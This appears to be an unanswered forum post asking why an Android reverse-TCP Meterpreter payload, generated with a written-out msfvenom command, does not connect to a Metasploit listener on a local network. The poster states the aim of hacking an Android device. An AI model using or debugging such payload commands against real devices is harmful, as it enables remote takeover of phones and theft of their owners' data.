Forum Thread: Payload Android Not Connect to Metasploit Listener Kali 2019

Hello I am trying to hack an Android via a reverse tcp payload
I generated the payload with
Msfvenom -p Android/meterpreter/reverse-tcp lhost= my-wlan0-ip lport=4444 R> payload.apk
Both the laptop and the Android are in the same network
But when I launch the exploit
It stop here
Started reverse tcp handler on 192.168.x.x:44444
Then nothing
I already try this with ngrok and it worked for me , but I wanted to do it in locale Network but it is not working
I am using Kali 2019 with the last version of metasploit

Be the First to Respond

Share Your Thoughts

  • Hot
  • Active